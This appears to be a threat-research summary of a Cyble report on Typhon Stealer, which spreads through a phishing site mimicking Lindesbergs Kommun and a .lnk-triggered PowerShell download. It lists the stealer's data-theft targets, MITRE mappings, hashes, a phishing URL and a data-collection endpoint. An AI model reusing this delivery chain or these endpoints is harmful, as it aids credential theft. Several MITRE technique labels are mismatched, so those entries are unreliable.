Threat Research

Cyble – Phishing Site Used To Spread Typhon Stealer

Securonix

Cyble researchers uncovered a phishing site impersonating Lindesbergs Kommun that delivers Typhon Stealer via a crafted .lnk file and PowerShell to download the payload. The stealer harvests data from browsers, wallets, gaming apps, and messaging tools, with exfiltration options and potential cryptominer delivery, including a Telegram-based marketplace. #TyphonStealer #PryntStealer #LindesbergsKommun #XMRig #AnonFiles #Telegram

Keypoints

  • Typhon Stealer is distributed through a phishing page that mimics Lindesbergs Kommun and uses a .lnk file to trigger a PowerShell-driven download of the payload.
  • The threat actor behind Typhon Stealer runs a Telegram channel and offers a lifetime subscription (about $50) and “spreading/crypting” services for others purchasing the stealer.
  • Payload analysis indicates Typhon is built on Prynt Stealer, with modules to deliver a XMRig cryptominer (in development or incomplete in the sample).
  • Anti-analysis, sandbox, and virtualization checks are baked in (mutex, GetModuleHandle checks, WMI queries) to hinder investigations and virtualization.
  • Typhon targets a wide range of data sources: browsers, crypto wallets, gaming apps (Steam, Uplay, Minecraft), FTP clients (FileZilla, WinSCP), messaging apps (Discord, Telegram, Pidgin), and system information.
  • Exfiltration occurs via Telegram and AnonFiles, with Formspree used by the phishing page to send captured data.
  • The campaign demonstrates multi-stage data theft, clipboard clipping for crypto addresses, keylogging, and potential credential access across multiple stores and formats.

MITRE Techniques

  • [T1566] Phishing – The lure is served via a phishing page hosting the TyphonStealer payload. Quote: “URL Hosting Phishing Page and TyphonStealer Payload”
  • [T1204] User Execution – When a user opens a .lnk file, it executes PowerShell to download and run Typhon Stealer. Quote: “When a user opens a .lnk file, it further executes a PowerShell command, downloads Typhon stealer from the remote server, and executes it.”
  • [T1497.001] Virtualization/Sandbox Evasion: System Checks – Anti-Analysis checks detect AV or sandbox, returning True and terminating with a fake error. Quote: “The malware initially performs various Anti-Analysis checks … will terminate itself with a fake error message.”
  • [T1555] Credentials from Password Stores – The stealer can steal data from multiple applications. Quote: “The stealer can steal data from multiple applications.”
  • [T1539] Steal Web Session Cookie – Stealer capabilities include extracting credentials from various sources (as per the article’s mapping). Quote: “Steal Web Session Cookie”
  • [T1552] Unsecured Credentials – Part of the stealer’s credential access capabilities. Quote: “Unsecured Credentials”
  • [T1528] Steal Application Access Token – Part of the stealer’s credential access capabilities. Quote: “Steal Application Access Token”
  • [T1113] Screen Capture – The stealer includes capabilities to capture user data such to screen-related info. Quote: “Screen Capture”
  • [T1087] Account Discovery – The malware conducts discovery related to user accounts on the system. Quote: “Account Discovery”
  • [T1518] Software Discovery – It enumerates software (e.g., sandbox/AV DLLs) to detect analysis environments. Quote: “Software Discovery”
  • [T1057] Process Discovery – It checks running processes to hinder analysis. Quote: “Process Discovery”
  • [T1124] System Time Discovery – It uses system time in its checks. Quote: “System Time Discovery”
  • [T1007] System Service Discovery – It identifies services on the host. Quote: “System Service Discovery”
  • [T1614] External Remote Services – Exfiltration over web services (e.g., Telegram/AnonFiles) as described in the article. Quote: “Exfiltration Over Web Service”
  • [T1095] Non-Application Layer Protocol – C2 or exfiltration communications through non-application protocols (Telegram/AnonFiles). Quote: “Non-Application Layer Protocol”
  • [T1041] Exfiltration – Data exfiltration to Telegram/AnonFiles. Quote: “Exfiltration Over C&C Channel” / “Exfiltration Over Web Service”

Indicators of Compromise

  • [MD5] TyphonStealer Payload – a1f146eb008f077be809ab4e61f46f4e, 79dc4a4192469c3e697afd81409a52da, and 2 more hashes
  • [SHA-1] TyphonStealer Payload – 8af9fc9aa7517ac327cc8692c2adf54537f39fe5, 51aa7b94b3f3921d21e730b113faa20e0f6b6902
  • [SHA-256] TyphonStealer Payload – e04e65ddad749789f4f05bb88e2c8bde8df9263950eb120ad1191f217ca0c742, 48133d1aaf1a47f63ec73781f6a2b085b28174895b5865b8993487daec373e0a, and 1 more hash
  • [URL] Lindesbergparkeringsanmarkning.netlify.app – URL Hosting Phishing Page and TyphonStealer Payload
  • [URL] formspree.io/f/xknylake – Data submission endpoint used by the phishing page

Read more: https://blog.cyble.com/2022/08/16/phishing-site-used-to-spread-typhon-stealer/